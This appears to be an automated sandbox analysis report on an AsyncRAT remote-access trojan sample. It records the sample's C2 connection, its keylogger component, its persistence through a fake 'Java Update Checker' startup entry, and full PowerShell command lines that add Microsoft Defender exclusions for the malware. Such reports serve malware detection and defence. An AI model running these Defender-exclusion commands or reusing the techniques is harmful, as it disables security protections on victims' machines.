                              Source: C:\Users\user\Desktop\x.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Jump to behavior
                              Source: C:\Users\user\Desktop\x.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\Jump to behavior
                              Source: C:\Users\user\Desktop\x.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\Jump to behavior
                              Source: C:\Users\user\Desktop\x.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\GatherLogs\Jump to behavior
                              Source: C:\Users\user\Desktop\x.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Jump to behavior

                              Networking

                              Source: Malware configuration extractor | URLs: 45.141.26.232
                              Source: Yara match | File source: 2.0.x.exe.dc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 2.2.x.exe.30cf840.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: C:\ProgramData\Java Update Checker (64 bit).exe, type: DROPPED
                              Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, type: DROPPED
                              Source: global traffic | TCP traffic: 192.168.2.7:49705 -> 45.141.26.232:6666
                              Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
                              Source: Joe Sandbox View | IP Address: 208.95.112.1
                              Source: Joe Sandbox View | ASN Name: TUT-ASUS
                              Source: Joe Sandbox View | ASN Name: SPECTRAIPSpectraIPBVNL
                              Source: unknown | DNS query: name: ip-api.com
                              Source: unknown | TCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
                              Source: global traffic | DNS traffic detected: DNS query: ip-api.com
                              Source: integrator.exe.0.dr | String found in binary or memory: http://127.0.0.1:13556/InsiderSlabBehaviorReportedBuildInsiderSlabBehaviorInsiderSlabBehaviorReporte
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                              Source: powershell.exe, 00000013.00000002.2023438315.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
                              Source: powershell.exe, 00000013.00000002.1946659267.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: AdobeARMHelper.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                              Source: armsvc.exe.0.dr, AdobeARMHelper.exe.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                              Source: x.exe, 00000002.00000002.2471076189.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000002.00000002.2471076189.00000000030C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
                              Source: x.exe | String found in binary or memory: http://ip-api.com/line/?fields=hosting
                              Source: svchost.com, 00000003.00000002.1905492456.0000000000193000.00000004.00000010.00020000.00000000.sdmp, Uninstall.exe.0.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                              Source: powershell.exe, 00000004.00000002.1397308567.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1989631818.00000000059A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1999920156.0000000006137000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2006838878.0000000006527000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0A
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0C
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0X
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
                              Source: powershell.exe, 00000019.00000002.1956487745.0000000005616000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                              Source: powershell.exe, 00000004.00000002.1376757787.0000000004DE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1950840726.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1954269308.0000000005226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1956487745.0000000005616000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                              Source: x.exe, 00000002.00000002.2471076189.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000002.00000002.2471076189.0000000003001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1376757787.0000000004C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1950840726.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1954269308.00000000050D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1956487745.00000000054C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: powershell.exe, 00000004.00000002.1376757787.0000000004DE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1950840726.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1954269308.0000000005226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1956487745.0000000005616000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                              Source: powershell.exe, 00000019.00000002.1956487745.0000000005616000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                              Source: Aut2exe.exe.0.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/
                              Source: Aut2exe.exe.0.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/8
                              Source: AutoIt3_x64.exe.0.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/J
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.dr | String found in binary or memory: http://www.digicert.com/CPS0
                              Source: powershell.exe, 00000004.00000002.1376757787.0000000004C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1950840726.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1954269308.00000000050D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1956487745.00000000054C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
                              Source: powershell.exe, 00000019.00000002.2006838878.0000000006527000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                              Source: powershell.exe, 00000019.00000002.2006838878.0000000006527000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                              Source: powershell.exe, 00000019.00000002.2006838878.0000000006527000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                              Source: powershell.exe, 00000019.00000002.1956487745.0000000005616000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                              Source: msedge_pwa_launcher.exe.0.dr, identity_helper.exe.0.dr, pwahelper.exe.0.dr, msedge_proxy.exe.3.dr | String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
                              Source: msedge_pwa_launcher.exe.0.dr, identity_helper.exe.0.dr, pwahelper.exe.0.dr, msedge_proxy.exe.3.dr | String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
                              Source: powershell.exe, 00000013.00000002.1946659267.000000000096D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ion=v4.5
                              Source: integrator.exe.0.dr | String found in binary or memory: https://nexus.officeapps.live.comhttps://nexusrules.officeapps.live.com
                              Source: powershell.exe, 00000004.00000002.1397308567.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1989631818.00000000059A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1999920156.0000000006137000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2006838878.0000000006527000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                              Source: integrator.exe.0.dr | String found in binary or memory: https://otelrules.azureedge.net/rules/.bundlesdxhelper.exeFailed
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.dr | String found in binary or memory: https://www.globalsign.com/repository/0

                              Key, Mouse, Clipboard, Microphone and Screen Capturing

                              Source: Yara match | File source: x.exe, type: SAMPLE
                              Source: Yara match | File source: 2.0.x.exe.dc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 2.2.x.exe.30cf840.1.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 2.2.x.exe.30cf840.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match | File source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara match | File source: Process Memory Space: x.exe PID: 5336, type: MEMORYSTR
                              Source: Yara match | File source: C:\ProgramData\Java Update Checker (64 bit).exe, type: DROPPED
                              Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, type: DROPPED
                              Source: x.exe.0.dr, XLogger.cs | .Net Code: KeyboardLayout
                              Source: Java Update Checker (64 bit).exe.2.dr, XLogger.cs | .Net Code: KeyboardLayout
                              Source: integrator.exe.0.dr | Binary or memory string: RegisterRawInputDevices (memstr_60b04ed4-5)

                              Operating System Destruction

                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Process information set: 01 00 00 00

                              System Summary

                              Source: x.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: 2.0.x.exe.dc0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: 2.2.x.exe.30cf840.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: 2.2.x.exe.30cf840.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: C:\ProgramData\Java Update Checker (64 bit).exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\svchost.com | File created: C:\Windows\directx.sys
Source: C:\Users\user\Desktop\x.exe | File created: C:\Windows\svchost.com
Source: C:\Windows\svchost.com | File created: C:\Windows\directx.sys
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Code function: 2_2_00007FFAACCA6662
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Code function: 2_2_00007FFAACCA0610
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Code function: 2_2_00007FFAACCA1771
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Code function: 2_2_00007FFAACCA58B6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_045DB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_045DB470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_08533E98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_045AB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_045AB470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_045A4F98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 22_2_04FEB4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 22_2_04FEB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 22_2_04FE20C5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 22_2_04FE0C50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 22_2_08AD3A98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 22_2_08AD4CF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_0537B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_0537B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_08F93AA8
Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\AutoIt3\Au3Check.exe A3C4641D4CB4608AF18CD06E4C01339C65C25B9289F0AA01CABE0E5C250A0E15
Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\AutoIt3\Au3Info.exe 55075BDACF914AF03AD6CD417AFFC3A604A73AFD3D06A2256A1835CBF0F39B5E
Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe B904C8888CD019FAD590E1135E917D944BC16340757BC90DDD3511359766B8BB
Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe 15D3823B1CB8C10E2F0A0882BC273093742E957F0E7DB05B98B8FF020897559D
Source: x.exe, 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameXClient.exe4 vs x.exe
Source: x.exe, 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp | Binary or memory string: OriginalFilenameXClient.exe4 vs x.exe
Source: x.exe | Binary or memory string: OriginalFilenameXClient.exe4 vs x.exe
Source: x.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: x.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.0.x.exe.dc0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.x.exe.30cf840.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.x.exe.30cf840.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\Java Update Checker (64 bit).exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: x.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: x.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: x.exe.0.dr, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Java Update Checker (64 bit).exe.2.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Java Update Checker (64 bit).exe.2.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Java Update Checker (64 bit).exe.2.dr, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: x.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: x.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Java Update Checker (64 bit).exe.2.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Java Update Checker (64 bit).exe.2.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: MpCmdRun.exe0.0.dr | Binary string: IdImageFileNameFirst Resource TypeTypeScan SourceFirst Resource PathEngineIdResource CountReasonProcessMessagePIDStartStopDataIsSignedFile\Device\\\?\\FI_UNKNOWN\drivers\error: invalid data: System Windows path changed during the trace from "%ls" to "%ls"
Source: classification engine | Classification label: mal100.spre.troj.spyw.evad.winEXE@23/194@1/2
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update Checker (64 bit).lnk
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5888:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Mutant created: \Sessions\1\BaseNamedObjects\2IFtGtBpRNgvGbsg
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
Source: C:\Windows\svchost.com | Mutant created: \Sessions\1\BaseNamedObjects\MutexPolesskayaGlush*.* svchost.com n X . t N t h ` T 5 @
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1316:120:WilError_03
Source: C:\Users\user\Desktop\x.exe | File created: C:\Users\user~1\AppData\Local\Temp\3582-490
Source: x.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.29%
Source: C:\Users\user\Desktop\x.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\x.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: integrator.exe.0.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: integrator.exe.0.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: integrator.exe.0.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: integrator.exe.0.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: x.exe | ReversingLabs: Detection: 97%
Source: x.exe | Virustotal: Detection: 93%
Source: C:\Users\user\Desktop\x.exe | File read: C:\Users\user\Desktop\x.exe
Source: unknown | Process created: C:\Users\user\Desktop\x.exe "C:\Users\user\Desktop\x.exe"
Source: C:\Users\user\Desktop\x.exe | Process created: C:\Users\user\AppData\Local\Temp\3582-490\x.exe "C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe"
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'
Source: C:\Windows\svchost.com | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
Source: C:\Windows\svchost.com | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'
Source: C:\Windows\svchost.com | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update Checker (64 bit).exe'
Source: C:\Windows\svchost.com | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update Checker (64 bit).exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\x.exe | Process created: C:\Users\user\AppData\Local\Temp\3582-490\x.exe "C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe"
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'
